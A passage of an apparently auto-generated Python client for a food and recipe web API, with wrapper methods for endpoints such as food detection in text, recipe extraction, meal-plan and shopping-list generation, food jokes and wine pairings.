        path_params,
        query_params,
        header_params,
        body=body_params,
        post_params=form_params,
        files=local_var_files,
        response_type='object',  # noqa: E501
        auth_settings=auth_settings,
        async_req=local_var_params.get('async_req'),
        _return_http_data_only=local_var_params.get('_return_http_data_only'),  # noqa: E501
        _preload_content=local_var_params.get('_preload_content', True),
        _request_timeout=local_var_params.get('_request_timeout'),
        collection_formats=collection_formats)
def detect_food_in_text(self, text, **kwargs):  # noqa: E501
    """Detect Food in Text  # noqa: E501

    Take any text and find all mentions of food contained within it. This task is also called Named Entity Recognition (NER). In this case, the entities are foods. Either dishes, such as pizza or cheeseburger, or ingredients, such as cucumber or almonds.  # noqa: E501
    This method makes a synchronous HTTP request by default. To make an
    asynchronous HTTP request, please pass async_req=True

    >>> thread = api.detect_food_in_text(text, async_req=True)
    >>> result = thread.get()

    :param async_req bool
    :param str text: The text in which food items, such as dish names and ingredients, should be detected in. (required)
    :return: object
             If the method is called asynchronously,
             returns the request thread.
    """
    # This convenience wrapper always discards status code and headers.
    kwargs['_return_http_data_only'] = True
    # The *_with_http_info variant handles both the synchronous and the
    # async_req=True (thread-returning) cases, so simply delegate.
    return self.detect_food_in_text_with_http_info(text, **kwargs)  # noqa: E501
def detect_food_in_text_with_http_info(self, text, **kwargs):  # noqa: E501
    """Detect Food in Text  # noqa: E501

    Take any text and find all mentions of food contained within it. This task is also called Named Entity Recognition (NER). In this case, the entities are foods. Either dishes, such as pizza or cheeseburger, or ingredients, such as cucumber or almonds.  # noqa: E501
    This method makes a synchronous HTTP request by default. To make an
    asynchronous HTTP request, please pass async_req=True

    >>> thread = api.detect_food_in_text_with_http_info(text, async_req=True)
    >>> result = thread.get()

    :param async_req bool
    :param str text: The text in which food items, such as dish names and ingredients, should be detected in. (required)
    :return: object
             If the method is called asynchronously,
             returns the request thread.
    """
    # locals() must be snapshotted first: it captures exactly the named
    # parameters (plus 'kwargs') before any other local is created.
    local_var_params = locals()

    all_params = ['text']  # noqa: E501
    all_params.append('async_req')
    all_params.append('_return_http_data_only')
    all_params.append('_preload_content')
    all_params.append('_request_timeout')

    # Reject unknown keyword arguments, then merge the accepted ones
    # into local_var_params alongside the positional parameters.
    for key, val in six.iteritems(local_var_params['kwargs']):
        if key not in all_params:
            raise ApiTypeError(
                "Got an unexpected keyword argument '%s'"
                " to method detect_food_in_text" % key
            )
        local_var_params[key] = val
    del local_var_params['kwargs']
    # verify the required parameter 'text' is set
    if ('text' not in local_var_params or
            local_var_params['text'] is None):
        raise ApiValueError("Missing the required parameter `text` when calling `detect_food_in_text`")  # noqa: E501

    collection_formats = {}

    path_params = {}

    query_params = []

    header_params = {}

    # 'text' travels as a form field (urlencoded POST body), not as a
    # query parameter.
    form_params = []
    local_var_files = {}
    if 'text' in local_var_params:
        form_params.append(('text', local_var_params['text']))  # noqa: E501

    body_params = None
    # HTTP header `Accept`
    header_params['Accept'] = self.api_client.select_header_accept(
        ['application/json'])  # noqa: E501

    # HTTP header `Content-Type`
    header_params['Content-Type'] = self.api_client.select_header_content_type(  # noqa: E501
        ['application/x-www-form-urlencoded'])  # noqa: E501

    # Authentication setting
    auth_settings = ['apiKeyScheme']  # noqa: E501

    return self.api_client.call_api(
        '/food/detect', 'POST',
        path_params,
        query_params,
        header_params,
        body=body_params,
        post_params=form_params,
        files=local_var_files,
        response_type='object',  # noqa: E501
        auth_settings=auth_settings,
        async_req=local_var_params.get('async_req'),
        _return_http_data_only=local_var_params.get('_return_http_data_only'),  # noqa: E501
        _preload_content=local_var_params.get('_preload_content', True),
        _request_timeout=local_var_params.get('_request_timeout'),
        collection_formats=collection_formats)
def extract_recipe_from_website(self, url, **kwargs):  # noqa: E501
    """Extract Recipe from Website  # noqa: E501

    This endpoint lets you extract recipe data such as title, ingredients, and instructions from any properly formatted Website.  # noqa: E501
    This method makes a synchronous HTTP request by default. To make an
    asynchronous HTTP request, please pass async_req=True

    >>> thread = api.extract_recipe_from_website(url, async_req=True)
    >>> result = thread.get()

    :param async_req bool
    :param str url: The URL of the recipe page. (required)
    :param bool force_extraction: If true, the extraction will be triggered whether we already know the recipe or not. Use this only if information is missing as this operation is slower.
    :param bool analyze: If true, the recipe will be analyzed and classified resolving in more data such as cuisines, dish types, and more.
    :return: object
             If the method is called asynchronously,
             returns the request thread.
    """
    # This convenience wrapper always discards status code and headers.
    kwargs['_return_http_data_only'] = True
    # The *_with_http_info variant handles both the synchronous and the
    # async_req=True (thread-returning) cases, so simply delegate.
    return self.extract_recipe_from_website_with_http_info(url, **kwargs)  # noqa: E501
def extract_recipe_from_website_with_http_info(self, url, **kwargs):  # noqa: E501
    """Extract Recipe from Website  # noqa: E501

    This endpoint lets you extract recipe data such as title, ingredients, and instructions from any properly formatted Website.  # noqa: E501
    This method makes a synchronous HTTP request by default. To make an
    asynchronous HTTP request, please pass async_req=True

    >>> thread = api.extract_recipe_from_website_with_http_info(url, async_req=True)
    >>> result = thread.get()

    :param async_req bool
    :param str url: The URL of the recipe page. (required)
    :param bool force_extraction: If true, the extraction will be triggered whether we already know the recipe or not. Use this only if information is missing as this operation is slower.
    :param bool analyze: If true, the recipe will be analyzed and classified resolving in more data such as cuisines, dish types, and more.
    :return: object
             If the method is called asynchronously,
             returns the request thread.
    """
    # locals() must be snapshotted first: it captures exactly the named
    # parameters (plus 'kwargs') before any other local is created.
    local_var_params = locals()

    all_params = ['url', 'force_extraction', 'analyze']  # noqa: E501
    all_params.append('async_req')
    all_params.append('_return_http_data_only')
    all_params.append('_preload_content')
    all_params.append('_request_timeout')

    # Reject unknown keyword arguments, then merge the accepted ones
    # into local_var_params alongside the positional parameters.
    for key, val in six.iteritems(local_var_params['kwargs']):
        if key not in all_params:
            raise ApiTypeError(
                "Got an unexpected keyword argument '%s'"
                " to method extract_recipe_from_website" % key
            )
        local_var_params[key] = val
    del local_var_params['kwargs']
    # verify the required parameter 'url' is set
    if ('url' not in local_var_params or
            local_var_params['url'] is None):
        raise ApiValueError("Missing the required parameter `url` when calling `extract_recipe_from_website`")  # noqa: E501

    collection_formats = {}

    path_params = {}

    # Optional flags map from snake_case params to camelCase query keys.
    query_params = []
    if 'url' in local_var_params:
        query_params.append(('url', local_var_params['url']))  # noqa: E501
    if 'force_extraction' in local_var_params:
        query_params.append(('forceExtraction', local_var_params['force_extraction']))  # noqa: E501
    if 'analyze' in local_var_params:
        query_params.append(('analyze', local_var_params['analyze']))  # noqa: E501

    header_params = {}

    form_params = []
    local_var_files = {}

    body_params = None
    # HTTP header `Accept`
    header_params['Accept'] = self.api_client.select_header_accept(
        ['application/json'])  # noqa: E501

    # Authentication setting
    auth_settings = ['apiKeyScheme']  # noqa: E501

    return self.api_client.call_api(
        '/recipes/extract', 'GET',
        path_params,
        query_params,
        header_params,
        body=body_params,
        post_params=form_params,
        files=local_var_files,
        response_type='object',  # noqa: E501
        auth_settings=auth_settings,
        async_req=local_var_params.get('async_req'),
        _return_http_data_only=local_var_params.get('_return_http_data_only'),  # noqa: E501
        _preload_content=local_var_params.get('_preload_content', True),
        _request_timeout=local_var_params.get('_request_timeout'),
        collection_formats=collection_formats)
def generate_meal_plan(self, **kwargs):  # noqa: E501
    """Generate Meal Plan  # noqa: E501

    Generate a meal plan with three meals per day (breakfast, lunch, and dinner).  # noqa: E501
    This method makes a synchronous HTTP request by default. To make an
    asynchronous HTTP request, please pass async_req=True

    >>> thread = api.generate_meal_plan(async_req=True)
    >>> result = thread.get()

    :param async_req bool
    :param str time_frame: Either for one \"day\" or an entire \"week\".
    :param float target_calories: What is the caloric target for one day? The meal plan generator will try to get as close as possible to that goal.
    :param str diet: Enter a diet that the meal plan has to adhere to. See a full list of supported diets.
    :param str exclude: A comma-separated list of allergens or ingredients that must be excluded.
    :return: object
             If the method is called asynchronously,
             returns the request thread.
    """
    # This convenience wrapper always discards status code and headers.
    kwargs['_return_http_data_only'] = True
    # The *_with_http_info variant handles both the synchronous and the
    # async_req=True (thread-returning) cases, so simply delegate.
    return self.generate_meal_plan_with_http_info(**kwargs)  # noqa: E501
def generate_meal_plan_with_http_info(self, **kwargs):  # noqa: E501
    """Generate Meal Plan  # noqa: E501

    Generate a meal plan with three meals per day (breakfast, lunch, and dinner).  # noqa: E501
    This method makes a synchronous HTTP request by default. To make an
    asynchronous HTTP request, please pass async_req=True

    >>> thread = api.generate_meal_plan_with_http_info(async_req=True)
    >>> result = thread.get()

    :param async_req bool
    :param str time_frame: Either for one \"day\" or an entire \"week\".
    :param float target_calories: What is the caloric target for one day? The meal plan generator will try to get as close as possible to that goal.
    :param str diet: Enter a diet that the meal plan has to adhere to. See a full list of supported diets.
    :param str exclude: A comma-separated list of allergens or ingredients that must be excluded.
    :return: object
             If the method is called asynchronously,
             returns the request thread.
    """
    # locals() must be snapshotted first: it captures the 'kwargs' dict
    # before any other local is created (all params here are optional).
    local_var_params = locals()

    all_params = ['time_frame', 'target_calories', 'diet', 'exclude']  # noqa: E501
    all_params.append('async_req')
    all_params.append('_return_http_data_only')
    all_params.append('_preload_content')
    all_params.append('_request_timeout')

    # Reject unknown keyword arguments, then merge the accepted ones
    # into local_var_params.
    for key, val in six.iteritems(local_var_params['kwargs']):
        if key not in all_params:
            raise ApiTypeError(
                "Got an unexpected keyword argument '%s'"
                " to method generate_meal_plan" % key
            )
        local_var_params[key] = val
    del local_var_params['kwargs']

    collection_formats = {}

    path_params = {}

    # Optional filters map from snake_case params to camelCase query keys.
    query_params = []
    if 'time_frame' in local_var_params:
        query_params.append(('timeFrame', local_var_params['time_frame']))  # noqa: E501
    if 'target_calories' in local_var_params:
        query_params.append(('targetCalories', local_var_params['target_calories']))  # noqa: E501
    if 'diet' in local_var_params:
        query_params.append(('diet', local_var_params['diet']))  # noqa: E501
    if 'exclude' in local_var_params:
        query_params.append(('exclude', local_var_params['exclude']))  # noqa: E501

    header_params = {}

    form_params = []
    local_var_files = {}

    body_params = None
    # HTTP header `Accept`
    header_params['Accept'] = self.api_client.select_header_accept(
        ['application/json'])  # noqa: E501

    # Authentication setting
    auth_settings = ['apiKeyScheme']  # noqa: E501

    return self.api_client.call_api(
        '/mealplanner/generate', 'GET',
        path_params,
        query_params,
        header_params,
        body=body_params,
        post_params=form_params,
        files=local_var_files,
        response_type='object',  # noqa: E501
        auth_settings=auth_settings,
        async_req=local_var_params.get('async_req'),
        _return_http_data_only=local_var_params.get('_return_http_data_only'),  # noqa: E501
        _preload_content=local_var_params.get('_preload_content', True),
        _request_timeout=local_var_params.get('_request_timeout'),
        collection_formats=collection_formats)
def generate_shopping_list(self, username, start_date, end_date, hash, inline_object13, **kwargs):  # noqa: E501
    """Generate Shopping List  # noqa: E501

    Generate the shopping list for a user from the meal planner in a given time frame.  # noqa: E501
    This method makes a synchronous HTTP request by default. To make an
    asynchronous HTTP request, please pass async_req=True

    >>> thread = api.generate_shopping_list(username, start_date, end_date, hash, inline_object13, async_req=True)
    >>> result = thread.get()

    :param async_req bool
    :param str username: The username. (required)
    :param str start_date: The start date in the format yyyy-mm-dd. (required)
    :param str end_date: The end date in the format yyyy-mm-dd. (required)
    :param str hash: The private hash for the username. (required)
    :param InlineObject13 inline_object13: (required)
    :return: object
             If the method is called asynchronously,
             returns the request thread.
    """
    # This convenience wrapper always discards status code and headers.
    kwargs['_return_http_data_only'] = True
    # The *_with_http_info variant handles both the synchronous and the
    # async_req=True (thread-returning) cases, so simply delegate.
    return self.generate_shopping_list_with_http_info(username, start_date, end_date, hash, inline_object13, **kwargs)  # noqa: E501
def generate_shopping_list_with_http_info(self, username, start_date, end_date, hash, inline_object13, **kwargs):  # noqa: E501
    """Generate Shopping List  # noqa: E501

    Generate the shopping list for a user from the meal planner in a given time frame.  # noqa: E501
    This method makes a synchronous HTTP request by default. To make an
    asynchronous HTTP request, please pass async_req=True

    >>> thread = api.generate_shopping_list_with_http_info(username, start_date, end_date, hash, inline_object13, async_req=True)
    >>> result = thread.get()

    :param async_req bool
    :param str username: The username. (required)
    :param str start_date: The start date in the format yyyy-mm-dd. (required)
    :param str end_date: The end date in the format yyyy-mm-dd. (required)
    :param str hash: The private hash for the username. (required)
    :param InlineObject13 inline_object13: (required)
    :return: object
             If the method is called asynchronously,
             returns the request thread.
    """
    # locals() must be snapshotted first: it captures exactly the named
    # parameters (plus 'kwargs') before any other local is created.
    local_var_params = locals()

    all_params = ['username', 'start_date', 'end_date', 'hash', 'inline_object13']  # noqa: E501
    all_params.append('async_req')
    all_params.append('_return_http_data_only')
    all_params.append('_preload_content')
    all_params.append('_request_timeout')

    # Reject unknown keyword arguments, then merge the accepted ones
    # into local_var_params alongside the positional parameters.
    for key, val in six.iteritems(local_var_params['kwargs']):
        if key not in all_params:
            raise ApiTypeError(
                "Got an unexpected keyword argument '%s'"
                " to method generate_shopping_list" % key
            )
        local_var_params[key] = val
    del local_var_params['kwargs']
    # verify the required parameter 'username' is set
    if ('username' not in local_var_params or
            local_var_params['username'] is None):
        raise ApiValueError("Missing the required parameter `username` when calling `generate_shopping_list`")  # noqa: E501
    # verify the required parameter 'start_date' is set
    if ('start_date' not in local_var_params or
            local_var_params['start_date'] is None):
        raise ApiValueError("Missing the required parameter `start_date` when calling `generate_shopping_list`")  # noqa: E501
    # verify the required parameter 'end_date' is set
    if ('end_date' not in local_var_params or
            local_var_params['end_date'] is None):
        raise ApiValueError("Missing the required parameter `end_date` when calling `generate_shopping_list`")  # noqa: E501
    # verify the required parameter 'hash' is set
    if ('hash' not in local_var_params or
            local_var_params['hash'] is None):
        raise ApiValueError("Missing the required parameter `hash` when calling `generate_shopping_list`")  # noqa: E501
    # verify the required parameter 'inline_object13' is set
    if ('inline_object13' not in local_var_params or
            local_var_params['inline_object13'] is None):
        raise ApiValueError("Missing the required parameter `inline_object13` when calling `generate_shopping_list`")  # noqa: E501

    collection_formats = {}

    # The URL template uses hyphenated placeholders ({start-date},
    # {end-date}), hence the hyphenated dict keys below.
    path_params = {}
    if 'username' in local_var_params:
        path_params['username'] = local_var_params['username']  # noqa: E501
    if 'start_date' in local_var_params:
        path_params['start-date'] = local_var_params['start_date']  # noqa: E501
    if 'end_date' in local_var_params:
        path_params['end-date'] = local_var_params['end_date']  # noqa: E501

    query_params = []
    if 'hash' in local_var_params:
        query_params.append(('hash', local_var_params['hash']))  # noqa: E501

    header_params = {}

    form_params = []
    local_var_files = {}

    # The inline object is sent as the request body (JSON-serialized by
    # the api_client).
    body_params = None
    if 'inline_object13' in local_var_params:
        body_params = local_var_params['inline_object13']
    # HTTP header `Accept`
    header_params['Accept'] = self.api_client.select_header_accept(
        ['application/json'])  # noqa: E501

    # HTTP header `Content-Type`
    # NOTE(review): the generated spec supplies an empty Content-Type
    # candidate list for this operation -- generator artifact, verify.
    header_params['Content-Type'] = self.api_client.select_header_content_type(  # noqa: E501
        [''])  # noqa: E501

    # Authentication setting
    auth_settings = ['apiKeyScheme']  # noqa: E501

    return self.api_client.call_api(
        '/mealplanner/{username}/shopping-list/{start-date}/{end-date}', 'POST',
        path_params,
        query_params,
        header_params,
        body=body_params,
        post_params=form_params,
        files=local_var_files,
        response_type='object',  # noqa: E501
        auth_settings=auth_settings,
        async_req=local_var_params.get('async_req'),
        _return_http_data_only=local_var_params.get('_return_http_data_only'),  # noqa: E501
        _preload_content=local_var_params.get('_preload_content', True),
        _request_timeout=local_var_params.get('_request_timeout'),
        collection_formats=collection_formats)
def get_a_random_food_joke(self, **kwargs):  # noqa: E501
    """Get a Random Food Joke  # noqa: E501

    Get a random joke that is related to food. Caution: this is an endpoint for adults!  # noqa: E501
    This method makes a synchronous HTTP request by default. To make an
    asynchronous HTTP request, please pass async_req=True

    >>> thread = api.get_a_random_food_joke(async_req=True)
    >>> result = thread.get()

    :param async_req bool
    :return: object
             If the method is called asynchronously,
             returns the request thread.
    """
    # This convenience wrapper always discards status code and headers.
    kwargs['_return_http_data_only'] = True
    # The *_with_http_info variant handles both the synchronous and the
    # async_req=True (thread-returning) cases, so simply delegate.
    return self.get_a_random_food_joke_with_http_info(**kwargs)  # noqa: E501
def get_a_random_food_joke_with_http_info(self, **kwargs):  # noqa: E501
    """Get a Random Food Joke  # noqa: E501

    Get a random joke that is related to food. Caution: this is an endpoint for adults!  # noqa: E501
    This method makes a synchronous HTTP request by default. To make an
    asynchronous HTTP request, please pass async_req=True

    >>> thread = api.get_a_random_food_joke_with_http_info(async_req=True)
    >>> result = thread.get()

    :param async_req bool
    :return: object
             If the method is called asynchronously,
             returns the request thread.
    """
    # locals() must be snapshotted first: it captures the 'kwargs' dict
    # before any other local is created (this endpoint has no params).
    local_var_params = locals()

    all_params = []  # noqa: E501
    all_params.append('async_req')
    all_params.append('_return_http_data_only')
    all_params.append('_preload_content')
    all_params.append('_request_timeout')

    # Reject unknown keyword arguments, then merge the accepted ones
    # into local_var_params.
    for key, val in six.iteritems(local_var_params['kwargs']):
        if key not in all_params:
            raise ApiTypeError(
                "Got an unexpected keyword argument '%s'"
                " to method get_a_random_food_joke" % key
            )
        local_var_params[key] = val
    del local_var_params['kwargs']

    collection_formats = {}

    path_params = {}

    query_params = []

    header_params = {}

    form_params = []
    local_var_files = {}

    body_params = None
    # HTTP header `Accept`
    header_params['Accept'] = self.api_client.select_header_accept(
        ['application/json'])  # noqa: E501

    # Authentication setting
    auth_settings = ['apiKeyScheme']  # noqa: E501

    return self.api_client.call_api(
        '/food/jokes/random', 'GET',
        path_params,
        query_params,
        header_params,
        body=body_params,
        post_params=form_params,
        files=local_var_files,
        response_type='object',  # noqa: E501
        auth_settings=auth_settings,
        async_req=local_var_params.get('async_req'),
        _return_http_data_only=local_var_params.get('_return_http_data_only'),  # noqa: E501
        _preload_content=local_var_params.get('_preload_content', True),
        _request_timeout=local_var_params.get('_request_timeout'),
        collection_formats=collection_formats)
def get_analyzed_recipe_instructions(self, id, **kwargs):  # noqa: E501
    """Get Analyzed Recipe Instructions  # noqa: E501

    Get an analyzed breakdown of a recipe's instructions. Each step is enriched with the ingredients and equipment required.  # noqa: E501
    This method makes a synchronous HTTP request by default. To make an
    asynchronous HTTP request, please pass async_req=True

    >>> thread = api.get_analyzed_recipe_instructions(id, async_req=True)
    >>> result = thread.get()

    :param async_req bool
    :param float id: The recipe id. (required)
    :param bool step_breakdown: Whether to break down the recipe steps even more.
    :return: object
             If the method is called asynchronously,
             returns the request thread.
    """
    # This convenience wrapper always discards status code and headers.
    kwargs['_return_http_data_only'] = True
    # The *_with_http_info variant handles both the synchronous and the
    # async_req=True (thread-returning) cases, so simply delegate.
    return self.get_analyzed_recipe_instructions_with_http_info(id, **kwargs)  # noqa: E501
def get_analyzed_recipe_instructions_with_http_info(self, id, **kwargs):  # noqa: E501
    """Get Analyzed Recipe Instructions  # noqa: E501

    Get an analyzed breakdown of a recipe's instructions. Each step is enriched with the ingredients and equipment required.  # noqa: E501
    This method makes a synchronous HTTP request by default. To make an
    asynchronous HTTP request, please pass async_req=True

    >>> thread = api.get_analyzed_recipe_instructions_with_http_info(id, async_req=True)
    >>> result = thread.get()

    :param async_req bool
    :param float id: The recipe id. (required)
    :param bool step_breakdown: Whether to break down the recipe steps even more.
    :return: object
             If the method is called asynchronously,
             returns the request thread.
    """
    # locals() must be snapshotted first: it captures exactly the named
    # parameters (plus 'kwargs') before any other local is created.
    local_var_params = locals()

    all_params = ['id', 'step_breakdown']  # noqa: E501
    all_params.append('async_req')
    all_params.append('_return_http_data_only')
    all_params.append('_preload_content')
    all_params.append('_request_timeout')

    # Reject unknown keyword arguments, then merge the accepted ones
    # into local_var_params alongside the positional parameters.
    for key, val in six.iteritems(local_var_params['kwargs']):
        if key not in all_params:
            raise ApiTypeError(
                "Got an unexpected keyword argument '%s'"
                " to method get_analyzed_recipe_instructions" % key
            )
        local_var_params[key] = val
    del local_var_params['kwargs']
    # verify the required parameter 'id' is set
    if ('id' not in local_var_params or
            local_var_params['id'] is None):
        raise ApiValueError("Missing the required parameter `id` when calling `get_analyzed_recipe_instructions`")  # noqa: E501

    collection_formats = {}

    path_params = {}
    if 'id' in local_var_params:
        path_params['id'] = local_var_params['id']  # noqa: E501

    # snake_case param maps to the camelCase 'stepBreakdown' query key.
    query_params = []
    if 'step_breakdown' in local_var_params:
        query_params.append(('stepBreakdown', local_var_params['step_breakdown']))  # noqa: E501

    header_params = {}

    form_params = []
    local_var_files = {}

    body_params = None
    # HTTP header `Accept`
    header_params['Accept'] = self.api_client.select_header_accept(
        ['application/json'])  # noqa: E501

    # Authentication setting
    auth_settings = ['apiKeyScheme']  # noqa: E501

    return self.api_client.call_api(
        '/recipes/{id}/analyzedInstructions', 'GET',
        path_params,
        query_params,
        header_params,
        body=body_params,
        post_params=form_params,
        files=local_var_files,
        response_type='object',  # noqa: E501
        auth_settings=auth_settings,
        async_req=local_var_params.get('async_req'),
        _return_http_data_only=local_var_params.get('_return_http_data_only'),  # noqa: E501
        _preload_content=local_var_params.get('_preload_content', True),
        _request_timeout=local_var_params.get('_request_timeout'),
        collection_formats=collection_formats)
def get_comparable_products(self, upc, **kwargs):  # noqa: E501
    """Get Comparable Products  # noqa: E501

    Find comparable products to the given one.  # noqa: E501
    This method makes a synchronous HTTP request by default. To make an
    asynchronous HTTP request, please pass async_req=True

    >>> thread = api.get_comparable_products(upc, async_req=True)
    >>> result = thread.get()

    :param async_req bool
    :param float upc: The UPC of the product for which you want to find
        comparable products. (required)
    :return: object
        If the method is called asynchronously, returns the request thread.
    """
    # Convenience wrapper: callers always get the deserialized payload,
    # never the raw (data, status, headers) triple.
    kwargs['_return_http_data_only'] = True
    # With async_req the delegate returns the request thread, otherwise
    # the response data -- both are passed straight through.
    return self.get_comparable_products_with_http_info(upc, **kwargs)  # noqa: E501
def get_comparable_products_with_http_info(self, upc, **kwargs):  # noqa: E501
    """Get Comparable Products  # noqa: E501

    Find comparable products to the given one.  # noqa: E501
    This method makes a synchronous HTTP request by default. To make an
    asynchronous HTTP request, please pass async_req=True

    >>> thread = api.get_comparable_products_with_http_info(upc, async_req=True)
    >>> result = thread.get()

    :param async_req bool
    :param float upc: The UPC of the product for which you want to find
        comparable products. (required)
    :return: object
        If the method is called asynchronously, returns the request thread.
    """
    # Capture locals() first so it holds exactly the named parameters
    # plus the 'kwargs' dict and nothing else.
    local_var_params = locals()

    all_params = [
        'upc',
        'async_req',
        '_return_http_data_only',
        '_preload_content',
        '_request_timeout',
    ]

    # Fold recognised keyword arguments into the parameter map; reject
    # anything this endpoint does not understand.
    extra_kwargs = local_var_params.pop('kwargs')
    for key, val in six.iteritems(extra_kwargs):
        if key not in all_params:
            raise ApiTypeError(
                "Got an unexpected keyword argument '%s'"
                " to method get_comparable_products" % key
            )
        local_var_params[key] = val

    # verify the required parameter 'upc' is set
    if local_var_params.get('upc') is None:
        raise ApiValueError("Missing the required parameter `upc` when calling `get_comparable_products`")  # noqa: E501

    collection_formats = {}

    path_params = {'upc': local_var_params['upc']}  # noqa: E501
    query_params = []
    form_params = []
    local_var_files = {}
    body_params = None

    header_params = {
        # HTTP header `Accept`
        'Accept': self.api_client.select_header_accept(
            ['application/json']),  # noqa: E501
    }

    # Authentication setting
    auth_settings = ['apiKeyScheme']  # noqa: E501

    return self.api_client.call_api(
        '/food/products/upc/{upc}/comparable', 'GET',
        path_params,
        query_params,
        header_params,
        body=body_params,
        post_params=form_params,
        files=local_var_files,
        response_type='object',  # noqa: E501
        auth_settings=auth_settings,
        async_req=local_var_params.get('async_req'),
        _return_http_data_only=local_var_params.get('_return_http_data_only'),  # noqa: E501
        _preload_content=local_var_params.get('_preload_content', True),
        _request_timeout=local_var_params.get('_request_timeout'),
        collection_formats=collection_formats)
def get_conversation_suggests(self, query, **kwargs):  # noqa: E501
    """Get Conversation Suggests  # noqa: E501

    This endpoint returns suggestions for things the user can say or ask
    the chatbot.  # noqa: E501
    This method makes a synchronous HTTP request by default. To make an
    asynchronous HTTP request, please pass async_req=True

    >>> thread = api.get_conversation_suggests(query, async_req=True)
    >>> result = thread.get()

    :param async_req bool
    :param str query: A (partial) query from the user. The endpoint will
        return if it matches topics it can talk about. (required)
    :param float number: The number of suggestions to return (between 1 and 25).
    :return: object
        If the method is called asynchronously, returns the request thread.
    """
    # Convenience wrapper: callers always get the deserialized payload,
    # never the raw (data, status, headers) triple.
    kwargs['_return_http_data_only'] = True
    # With async_req the delegate returns the request thread, otherwise
    # the response data -- both are passed straight through.
    return self.get_conversation_suggests_with_http_info(query, **kwargs)  # noqa: E501
def get_conversation_suggests_with_http_info(self, query, **kwargs):  # noqa: E501
    """Get Conversation Suggests  # noqa: E501

    This endpoint returns suggestions for things the user can say or ask
    the chatbot.  # noqa: E501
    This method makes a synchronous HTTP request by default. To make an
    asynchronous HTTP request, please pass async_req=True

    >>> thread = api.get_conversation_suggests_with_http_info(query, async_req=True)
    >>> result = thread.get()

    :param async_req bool
    :param str query: A (partial) query from the user. The endpoint will
        return if it matches topics it can talk about. (required)
    :param float number: The number of suggestions to return (between 1 and 25).
    :return: object
        If the method is called asynchronously, returns the request thread.
    """
    # Capture locals() first so it holds exactly the named parameters
    # plus the 'kwargs' dict and nothing else.
    local_var_params = locals()

    all_params = [
        'query',
        'number',
        'async_req',
        '_return_http_data_only',
        '_preload_content',
        '_request_timeout',
    ]

    # Fold recognised keyword arguments into the parameter map; reject
    # anything this endpoint does not understand.
    extra_kwargs = local_var_params.pop('kwargs')
    for key, val in six.iteritems(extra_kwargs):
        if key not in all_params:
            raise ApiTypeError(
                "Got an unexpected keyword argument '%s'"
                " to method get_conversation_suggests" % key
            )
        local_var_params[key] = val

    # verify the required parameter 'query' is set
    if local_var_params.get('query') is None:
        raise ApiValueError("Missing the required parameter `query` when calling `get_conversation_suggests`")  # noqa: E501

    collection_formats = {}
    path_params = {}

    query_params = [('query', local_var_params['query'])]  # noqa: E501
    if 'number' in local_var_params:
        query_params.append(('number', local_var_params['number']))  # noqa: E501

    form_params = []
    local_var_files = {}
    body_params = None

    header_params = {
        # HTTP header `Accept`
        'Accept': self.api_client.select_header_accept(
            ['application/json']),  # noqa: E501
    }

    # Authentication setting
    auth_settings = ['apiKeyScheme']  # noqa: E501

    return self.api_client.call_api(
        '/food/converse/suggest', 'GET',
        path_params,
        query_params,
        header_params,
        body=body_params,
        post_params=form_params,
        files=local_var_files,
        response_type='object',  # noqa: E501
        auth_settings=auth_settings,
        async_req=local_var_params.get('async_req'),
        _return_http_data_only=local_var_params.get('_return_http_data_only'),  # noqa: E501
        _preload_content=local_var_params.get('_preload_content', True),
        _request_timeout=local_var_params.get('_request_timeout'),
        collection_formats=collection_formats)
def get_dish_pairing_for_wine(self, wine, **kwargs):  # noqa: E501
    """Get Dish Pairing for Wine  # noqa: E501

    Find a dish that goes well with a given wine.  # noqa: E501
    This method makes a synchronous HTTP request by default. To make an
    asynchronous HTTP request, please pass async_req=True

    >>> thread = api.get_dish_pairing_for_wine(wine, async_req=True)
    >>> result = thread.get()

    :param async_req bool
    :param str wine: The type of wine that should be paired, e.g.
        \"merlot\", \"riesling\", or \"malbec\". (required)
    :return: object
        If the method is called asynchronously, returns the request thread.
    """
    # Convenience wrapper: callers always get the deserialized payload,
    # never the raw (data, status, headers) triple.
    kwargs['_return_http_data_only'] = True
    # With async_req the delegate returns the request thread, otherwise
    # the response data -- both are passed straight through.
    return self.get_dish_pairing_for_wine_with_http_info(wine, **kwargs)  # noqa: E501
def get_dish_pairing_for_wine_with_http_info(self, wine, **kwargs):  # noqa: E501
    """Get Dish Pairing for Wine  # noqa: E501

    Find a dish that goes well with a given wine.  # noqa: E501
    This method makes a synchronous HTTP request by default. To make an
    asynchronous HTTP request, please pass async_req=True

    >>> thread = api.get_dish_pairing_for_wine_with_http_info(wine, async_req=True)
    >>> result = thread.get()

    :param async_req bool
    :param str wine: The type of wine that should be paired, e.g.
        \"merlot\", \"riesling\", or \"malbec\". (required)
    :return: object
        If the method is called asynchronously, returns the request thread.
    """
    # Capture locals() first so it holds exactly the named parameters
    # plus the 'kwargs' dict and nothing else.
    local_var_params = locals()

    all_params = [
        'wine',
        'async_req',
        '_return_http_data_only',
        '_preload_content',
        '_request_timeout',
    ]

    # Fold recognised keyword arguments into the parameter map; reject
    # anything this endpoint does not understand.
    extra_kwargs = local_var_params.pop('kwargs')
    for key, val in six.iteritems(extra_kwargs):
        if key not in all_params:
            raise ApiTypeError(
                "Got an unexpected keyword argument '%s'"
                " to method get_dish_pairing_for_wine" % key
            )
        local_var_params[key] = val

    # verify the required parameter 'wine' is set
    if local_var_params.get('wine') is None:
        raise ApiValueError("Missing the required parameter `wine` when calling `get_dish_pairing_for_wine`")  # noqa: E501

    collection_formats = {}
    path_params = {}

    query_params = [('wine', local_var_params['wine'])]  # noqa: E501

    form_params = []
    local_var_files = {}
    body_params = None

    header_params = {
        # HTTP header `Accept`
        'Accept': self.api_client.select_header_accept(
            ['application/json']),  # noqa: E501
    }

    # Authentication setting
    auth_settings = ['apiKeyScheme']  # noqa: E501

    return self.api_client.call_api(
        '/food/wine/dishes', 'GET',
        path_params,
        query_params,
        header_params,
        body=body_params,
        post_params=form_params,
        files=local_var_files,
        response_type='object',  # noqa: E501
        auth_settings=auth_settings,
        async_req=local_var_params.get('async_req'),
        _return_http_data_only=local_var_params.get('_return_http_data_only'),  # noqa: E501
        _preload_content=local_var_params.get('_preload_content', True),
        _request_timeout=local_var_params.get('_request_timeout'),
        collection_formats=collection_formats)
def get_ingredient_information(self, id, **kwargs):  # noqa: E501
    """Get Ingredient Information  # noqa: E501

    Use an ingredient id to get all available information about an
    ingredient, such as its image and supermarket aisle.  # noqa: E501
    This method makes a synchronous HTTP request by default. To make an
    asynchronous HTTP request, please pass async_req=True

    >>> thread = api.get_ingredient_information(id, async_req=True)
    >>> result = thread.get()

    :param async_req bool
